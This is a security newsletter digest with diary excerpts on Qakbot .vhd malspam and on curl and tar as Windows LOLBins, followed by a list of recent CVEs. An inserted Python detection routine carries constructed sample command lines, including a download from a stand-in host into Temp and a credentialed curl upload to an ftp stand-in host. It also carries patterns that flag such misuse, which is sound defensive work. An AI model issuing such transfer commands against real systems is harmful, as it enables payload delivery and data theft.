INTERNET STORM CENTER SPOTLIGHT

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html


obama224 distribution Qakbot tries .vhd (virtual hard disk)

Published: 2022-12-02
Last Updated: 2022-12-02 06:47:42 UTC
by Brad Duncan (Version: 1)

Introduction

Qakbot (also called Qbot) is a long-running malware family that has seen widespread distribution through malicious spam (malspam) in recent years. During an infection, Qakbot performs different functions as an information stealer, backdoor, and malware downloader.

Metadata tags in the malware code are tied to a specific distribution campaign. The "obama" series distribution tag includes a 3-digit suffix, and it currently represents thread-hijacked emails with attachments for HTML smuggling. When opened, the attached HTML file presents a password-protected zip archive to download, and the web page displays the password.

In recent months, password-protected zip archives for Qakbot have contained disk images using the .iso file extension. However, on Thursday 2022-12-01, zip archives for obama224 Qakbot contained images using the .vhd file extension.

VHD files have been used by other criminal groups to distribute malware, but this is the first I remember seeing them for obama-series Qakbot.

In Microsoft Windows, ISO files can easily be mounted by any normal user account. However, VHD images require an administrative Windows account. Because of this, normal user accounts in an Active Directory (AD) environment cannot mount VHD files on a Windows client without administrative login credentials. VHD images can easily mount on stand-alone Windows 10 or 11 hosts that use administrative accounts.

Read the entire diary entry:
https://isc.sans.edu/diary/obama224+distribution+Qakbot+tries+vhd+virtual+hard+disk+images/29294/



Linux LOLBins Applications Available in Windows

Published: 2022-12-03
Last Updated: 2022-12-03 20:09:25 UTC
by Guy Bruneau (Version: 1)

Some useful Linux applications are now part of the default installation in Windows 10 and Windows Server 2019/2022 (LOLBins: Living Off the Land Binaries).

cURL

The first one is curl, which is very useful in scripts for downloading or uploading files, optionally with a username and password (see curl --help), and for saving the output either to a new filename or to the same name:

tar

The next application, tar (tar --help), is used to store, extract and manipulate archive files. Let's take the previous file Example.csv, archive and compress it, and then review the result. Using the same options as on Linux will use gzip compression and create the file...
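Because curl.exe and tar.exe now ship with Windows, the defensive question is how to tell routine use from abuse. As an added example (not from Guy's diary, and not tied to any real telemetry), the following Python triage routine runs over constructed process-creation records in the shape of Security event 4688 fields and flags the two LOLBins when a document reader or script host spawns them, or when the command line downloads, uploads (including credentials) or extracts into a user-writable path; the parent list, option patterns and sample events are all assumptions.

```python
import re

# Constructed sample process-creation events (not real telemetry), laid out as
# Security event 4688 fields: NewProcessName|ParentProcessName|CommandLine
SAMPLE_EVENTS = [
    r"C:\Windows\System32\curl.exe|C:\Windows\System32\cmd.exe|curl --help",
    r"C:\Windows\System32\curl.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|curl -o C:\Users\bob\AppData\Local\Temp\x.zip http://example.invalid/x.zip",
    r"C:\Windows\System32\tar.exe|C:\Windows\System32\wscript.exe"
    r"|tar -xf C:\Users\bob\AppData\Local\Temp\x.zip -C C:\Users\bob\AppData\Local\Temp",
    r"C:\Windows\System32\tar.exe|C:\Windows\System32\cmd.exe|tar -czf Example.tar.gz Example.csv",
    r"C:\Windows\System32\curl.exe|C:\Windows\System32\cmd.exe|curl -u admin:pass -T Example.csv ftp://example.invalid/",
]

LOLBINS = {"curl.exe", "tar.exe"}
# Assumed list: document readers and script hosts that normally never spawn a transfer or archive tool
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
DOWNLOAD_OPTS = re.compile(r"(?:^|\s)(?:-o|--output|-O|--remote-name)(?:\s|$)")
UPLOAD_OPTS = re.compile(r"(?:^|\s)(?:-T|--upload-file|-d|--data|-u|--user)(?:\s|$)")
EXTRACT_OPTS = re.compile(r"(?:^|\s)-[a-zA-Z]*x[a-zA-Z]*(?:\s|$)")  # tar -x, -xf, -xzf ...
USER_PATH = re.compile(r"\\Users\\|\\Temp\\|%TEMP%|%APPDATA%", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the reasons an event looks suspicious ([] if benign or not a LOLBin)."""
    proc, parent, cmdline = event.split("|", 2)
    name, reasons = basename(proc), []
    if name not in LOLBINS:
        return reasons
    if basename(parent) in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {basename(parent)}")
    if name == "curl.exe":
        if DOWNLOAD_OPTS.search(cmdline) and USER_PATH.search(cmdline):
            reasons.append("download into user-writable path")
        if UPLOAD_OPTS.search(cmdline):
            reasons.append("upload or credentials on command line")
    elif EXTRACT_OPTS.search(cmdline) and USER_PATH.search(cmdline):
        reasons.append("extraction into user-writable path")
    return reasons


def scan(events):
    """Return (binary, reasons) for every event that tripped at least one heuristic."""
    triaged = [(basename(e.split("|", 1)[0]), triage(e)) for e in events]
    return [(name, reasons) for name, reasons in triaged if reasons]
```

Calling scan(SAMPLE_EVENTS) leaves the plain "curl --help" and the "tar -czf" archive run from the diary unflagged, while the Office-spawned download, the script-host extraction and the credentialed upload are each reported with their reasons.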


Read the entire diary entry:
https://isc.sans.edu/diary/Linux+LOLBins+Applications+Available+in+Windows/29296/

OTHER INTERNET STORM CENTER ENTRIES

Wireshark 4.0.2 and 3.6.10 released (2022-12-07)
https://isc.sans.edu/diary/Wireshark+402+and+3610+released/29316/

Mirai Botnet and Gafgyt DDoS Team Up Against SOHO Routers. (2022-12-06)
https://isc.sans.edu/diary/Mirai+Botnet+and+Gafgyt+DDoS+Team+Up+Against+SOHO+Routers/29304/

VLC's Check For Updates: No Updates? (2022-12-05)
https://isc.sans.edu/diary/VLCs+Check+For+Updates+No+Updates/29300/

Finger.exe LOLBin (2022-12-04)
https://isc.sans.edu/diary/Fingerexe+LOLBin/29298/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2022-34721 - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-34722.
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-34721
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8270



CVE-2021-35587 - Oracle Fusion Middleware Unspecified Vulnerability
CVSS Score: 0
** KEV since 2022-11-28 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-35587
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8270



CVE-2022-44721 - CrowdStrike Falcon 6.44.15806 allows an administrative attacker to uninstall Falcon Sensor, bypassing the intended protection mechanism in which uninstallation requires possessing a one-time token. (The sensor is managed at the kernel level.)
CVSS Score: 4.9
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44721
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8276
NVD References: https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller



CVE-2022-4262 - Chromium: CVE-2022-4262 Type Confusion in V8
CVSS Score: 0
** KEV since 2022-12-05 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4262
MSFT Details: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-4262
NVD References:
- https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html
- https://crbug.com/1394403



CVE-2022-4116 - A vulnerability was found in quarkus. This security flaw happens in Dev UI Config Editor which is vulnerable to drive-by localhost attacks leading to remote code execution.
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4116
ISC Podcast: https://isc.sans.edu/podcastdetail.html?id=8274



CVE-2022-42109 - Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42109
NVD References:
- https://github.com/PuneethReddyHC/online-shopping-system-advanced
- https://medium.com/@grimthereaperteam/online-shopping-system-advanced-sql-injection-at-product-php-c55c435c35c2



CVE-2022-44038 - Russound XSourcePlayer 777D v06.08.03 was discovered to contain a remote code execution vulnerability via the scriptRunner.cgi component.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44038
NVD References: https://cyber-guy.gitbook.io/cyber-guys-blog/pocs/cve-2022-44038



CVE-2022-44354 - SolarView Compact 4.0 and 5.0 is vulnerable to Unrestricted File Upload via a crafted php file.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44354
NVD References: https://github.com/strik3r0x1/Vulns/blob/main/Unrestricted%20File%20Upload_%20SolarView%20Compact%204.0%2C5.0.md



CVE-2022-3751 - SQL Injection in GitHub repository owncast/owncast prior to 0.0.13.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-3751
NVD References:
- https://github.com/owncast/owncast/commit/23b6e5868d5501726c27a3fabbecf49000968591
- https://huntr.dev/bounties/a04cff99-5d53-45e5-a882-771b0fad62c9



CVE-2022-44096 - Sanitization Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44096
NVD References: https://github.com/upasvi/CVE-/issues/1



CVE-2022-44097 - Book Store Management System v1.0 was discovered to contain hardcoded credentials which allows attackers to escalate privileges and access the admin panel.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44097
NVD References: https://github.com/upasvi/CVE-/issues/2



CVE-2022-4222 - A vulnerability was found in SourceCodester Canteen Management System. It has been rated as critical. This issue affects the function query of the file ajax_invoice.php of the component POST Request Handler. The manipulation of the argument search leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214523.
CVE-2022-4229 - A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.
CVE-2022-4232 - A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4222
NVD References:
- https://vuldb.com/?id.214523
- https://www.jianshu.com/p/bda61089bf1d
- https://github.com/lithonn/bug-report/tree/main/vendors/oretnom23/bsms_ci/broken-access-control
- https://vuldb.com/?id.214588
- https://vuldb.com/?id.214590



CVE-2022-44136 - Zenario CMS 9.3.57186 is vulnerable to Remote Code Execution (RCE).
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44136
NVD References: https://com0t.github.io/zenar.io/2022/10/18/Unauthent-RCE-Zenar.io~9.3.html



CVE-2022-44151 - Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44151
NVD References: https://github.com/li-baige/bug_report/blob/main/vendors/oretnom23/Simple%20Inventory%20Management%20System/SQLi-1.md



CVE-2022-46162 - discourse-bbcode is the official BBCode plugin for Discourse. Prior to commit 91478f5, CSS injection can occur when rendering content generated with the discourse-bbcode plugin. This vulnerability only affects sites which have the discourse-bbcode plugin installed and enabled. This issue is patched in commit 91478f5. As a workaround, ensure that the Content Security Policy is enabled and monitor any posts that contain bbcode.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-46162
NVD References:
- https://github.com/discourse/discourse-bbcode/commit/91478f5cfecdcc43cf85b997168a8ecfd0f8df90
- https://github.com/discourse/discourse-bbcode/security/advisories/GHSA-8c87-xpqv-c7mp



CVE-2022-44262 - ff4j 1.8.1 is vulnerable to Remote Code Execution (RCE).
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-44262
NVD References: https://github.com/ff4j/ff4j/issues/624



CVE-2022-36431 - An arbitrary file upload vulnerability in Rocket TRUfusion Enterprise before 7.9.6.1 allows unauthenticated attackers to execute arbitrary code via a crafted JSP file. Issue fixed in version 7.9.6.1.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-36431
NVD References:
- https://docs.rocketsoftware.com/bundle/TRUfusionEnterprise_ReleaseNotes_V7.9.6.1/resource/TRUfusionEnterprise_ReleaseNotes_V7.9.6.1.pdf
- https://www.synacktiv.com/sites/default/files/2022-11/trufusion_enterprise_unauthenticated_arbitrary_file_write.pdf



CVE-2022-4247 - A vulnerability classified as critical was found in Movie Ticket Booking System. This vulnerability affects unknown code of the file booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214624.
CVE-2022-4248 - A vulnerability, which was classified as critical, has been found in Movie Ticket Booking System. This issue affects some unknown processing of the file editBooking.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-214625 was assigned to this vulnerability.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4247
NVD References:
- https://github.com/aman05382/movie_ticket_booking_system_php/issues/1
- https://vuldb.com/?id.214624
- https://github.com/aman05382/movie_ticket_booking_system_php/issues/3
- https://vuldb.com/?id.214625



CVE-2022-4221 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Asus NAS-M25 allows an unauthenticated attacker to inject arbitrary OS commands via unsanitized cookie values. This issue affects NAS-M25: through 1.0.1.7.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4221
NVD References: https://onekey.com/blog/security-advisory-asus-m25-nas-vulnerability/



CVE-2022-1471 - SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-1471
NVD References: https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2



CVE-2022-3270 - In multiple products by Festo a remote unauthenticated attacker could use functions of an undocumented protocol which could lead to a complete loss of confidentiality, integrity and availability.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-3270
NVD References: https://cert.vde.com/en/advisories/VDE-2022-041/



CVE-2022-30528 - SQL Injection vulnerability in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to execute arbitrary commands via the username parameter to /system/user/modules/mod_users/controller.php.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-30528
NVD References:
- https://github.com/asith-eranga/isic
- https://github.com/killmonday/isic.lk-RCE



CVE-2022-37016 - Symantec Endpoint Protection (Windows) agent may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-37016
NVD References: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/21014



CVE-2022-4257 - A vulnerability was found in C-DATA Web Management System. It has been rated as critical. This issue affects some unknown processing of the file cgi-bin/jumpto.php of the component GET Parameter Handler. The manipulation of the argument hostname leads to argument injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214631.
CVSS Score: 9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-4257
NVD References:
- https://github.com/siriuswhiter/VulnHub/blob/main/C-Data/rce1.md
- https://vuldb.com/?id.214631